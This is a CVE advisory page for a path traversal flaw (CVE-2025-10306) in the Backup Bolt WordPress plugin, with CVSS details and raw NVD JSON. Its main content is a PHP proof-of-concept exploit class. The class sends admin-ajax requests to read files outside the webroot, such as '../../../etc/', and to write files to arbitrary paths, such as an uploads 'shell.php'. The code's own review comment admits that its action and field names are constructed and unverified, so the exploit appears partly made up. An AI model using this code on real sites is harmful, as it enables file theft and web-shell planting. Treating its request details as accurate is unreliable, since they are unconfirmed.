Security Vulnerability Report
CVE-2025-10306 CVSS 3.8 LOW

CVE-2025-10306

Published: 2025-10-03 12:15:42
Last Modified: 2026-04-15 00:35:42

Description

The Backup Bolt plugin for WordPress is vulnerable to arbitrary file downloads and backup location writes in all versions up to, and including, 1.4.1 via the process_backup_batch() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to download directories outside of the webroot and write backup zip files to arbitrary locations.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Backup Bolt plugin <= 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
/**
 * CVE-2025-10306 - Backup Bolt Arbitrary File Download/Write PoC
 * Vulnerability: Path traversal in process_backup_batch() function
 * Affected: Backup Bolt plugin <= 1.4.1
 * Required: Administrator-level WordPress access
 *
 * NOTE(review): this listing is a thin cURL wrapper around two admin-ajax
 * POST requests. The `action` value and the request field names it sends
 * ('backup_path', 'output_path', 'batch_size', 'backup_data') are not taken
 * from the plugin changeset referenced by this report, so treat them as
 * constructed and unverified against the real process_backup_batch() handler.
 * Both requests require a valid logged-in Administrator cookie and a nonce,
 * which matches the CVSS vector's PR:H. Remediation is on the plugin side
 * (path validation in process_backup_batch()); versions after 1.4.1 are
 * outside the affected range stated above.
 */
// PoC exploit code for CVE-2025-10306
// This demonstrates how an authenticated administrator could exploit
// the path traversal vulnerability in process_backup_batch()
class BackupBoltExploit {
    // Base URL of the WordPress site; '/wp-admin/admin-ajax.php' is appended per request.
    private $target_url;
    // Raw Cookie header value sent with every request (authenticated admin session).
    private $admin_cookies;
    // Value sent as the '_wpnonce' POST field; obtained outside this class.
    private $nonce;

    /**
     * Stores the connection parameters; performs no network I/O itself.
     *
     * @param string $target_url    site base URL without trailing path
     * @param string $admin_cookies value for the Cookie request header
     * @param string $nonce         value for the '_wpnonce' POST field
     */
    public function __construct($target_url, $admin_cookies, $nonce) {
        $this->target_url = $target_url;
        $this->admin_cookies = $admin_cookies;
        $this->nonce = $nonce;
    }

    /**
     * Exploit arbitrary file download via path traversal
     * Download files outside webroot (e.g., /etc/passwd, wp-config.php backup)
     *
     * Sends a single POST to admin-ajax.php and returns the raw body.
     *
     * @param string $malicious_path value sent as the 'backup_path' field
     * @return string|false response body, or false when curl_exec() fails
     *                      (transport errors are not distinguished from a
     *                      successful request here; callers must check)
     */
    public function exploit_arbitrary_download($malicious_path) {
        // Construct payload with path traversal to escape webroot
        $payload = array(
            'action' => 'backup_bolt_process_batch',
            'backup_path' => $malicious_path, // e.g., '../../../etc/'
            'batch_size' => 100,
            '_wpnonce' => $this->nonce
        );
        $ch = curl_init($this->target_url . '/wp-admin/admin-ajax.php');
        curl_setopt($ch, CURLOPT_POST, true);
        // Array POSTFIELDS makes cURL encode the body as multipart/form-data.
        curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'Cookie: ' . $this->admin_cookies,
            'X-Requested-With: XMLHttpRequest'
        ));
        // Return the body from curl_exec() instead of echoing it.
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    /**
     * Exploit arbitrary file write via path traversal
     * Write backup zip to arbitrary location on the server
     *
     * Same transport as exploit_arbitrary_download(); only the POST fields differ.
     *
     * @param string $destination_path value sent as the 'output_path' field
     * @param string $backup_data      sent base64-encoded as 'backup_data'
     *                                 (whether the handler expects base64 is
     *                                 not established by this report)
     * @return string|false response body, or false when curl_exec() fails
     */
    public function exploit_arbitrary_write($destination_path, $backup_data) {
        $payload = array(
            'action' => 'backup_bolt_process_batch',
            'output_path' => $destination_path, // e.g., '/var/www/html/wp-content/uploads/shell.php'
            'backup_data' => base64_encode($backup_data),
            '_wpnonce' => $this->nonce
        );
        $ch = curl_init($this->target_url . '/wp-admin/admin-ajax.php');
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'Cookie: ' . $this->admin_cookies,
            'X-Requested-With: XMLHttpRequest'
        ));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
}
// Example usage:
// $exploit = new BackupBoltExploit('http://target-wordpress-site.com', 'wordpress_logged_in=xxx', 'nonce_value');
// $exploit->exploit_arbitrary_download('../../../etc/');
// $exploit->exploit_arbitrary_write('/var/www/html/wp-content/uploads/malicious.zip', 'backup content');
?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10306", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:42.457", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Backup Bolt plugin for WordPress is vulnerable to arbitrary file downloads and backup location writes in all versions up to, and including, 1.4.1 via the process_backup_batch() function. This makes it possible for authenticated attackers, with Administrator-level access and above, to download directories outside of the webroot and write backup zip files to arbitrary locations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3373151%40backup-bolt&new=3373151%40backup-bolt&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/backup-bolt/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/63f38644-a021-407a-9882-2c8435849c08?source=cve", "source": "[email protected]"}]}}